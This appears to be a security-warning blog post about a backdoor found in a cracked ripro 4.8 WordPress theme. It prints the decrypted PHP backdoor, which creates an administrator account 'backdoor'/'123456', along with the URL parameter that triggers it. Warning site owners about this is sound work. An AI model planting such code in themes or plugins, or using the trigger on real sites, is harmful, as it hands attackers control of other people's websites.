The ripro Theme is a paid Theme originally created by a Chinese developer. Many website owners like the ripro Theme but are reluctant to spend money on the genuine version, so they download the cracked version of the ripro Theme online. The latest cracked version of ripro Theme 4.8 has been exposed to contain a backdoor. If you have also used it, go check it out immediately. The file containing the backdoor in the cracked ripro Theme is located at:
RiPro4.8/wp-content/theme/ripro/inc/class/core.class.phpThis file is encrypted, and the decrypted content is as follows:
add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {
require('wp-includes/registration.php');
if (!username_exists('backdoor')) { //检测是否存在backdoor账户
$user_id = wp_create_user('backdoor', '123456'); //创建账户
$user = new WP_User($user_id);
$user->set_role('administrator'); //设置为管理员权限
}
}
}The purpose of this code is: When accessed via http(s)://your-domain/?backdoor=go, it automatically creates an administrator account with the username 'backdoor' and password '123456'.
Therefore, for the security of your website,
building your own websiteit's best not to use cracked Themes. If you find encrypted files in a Theme downloaded from the internet, it's highly likely that something has been hidden inside. Learn more
WordPress Securityarticle. Original text:
52PoJie
Therefore, for the security of your website,building your own websiteit's best not to use cracked Themes. If you find encrypted files in a Theme downloaded from the internet, it's highly likely that something has been hidden inside. Learn moreWordPress Securityarticle. Original text:52PoJie
Comments are closed
The comment function for this article is closed. If you have any questions, please feel free to contact us through other channels.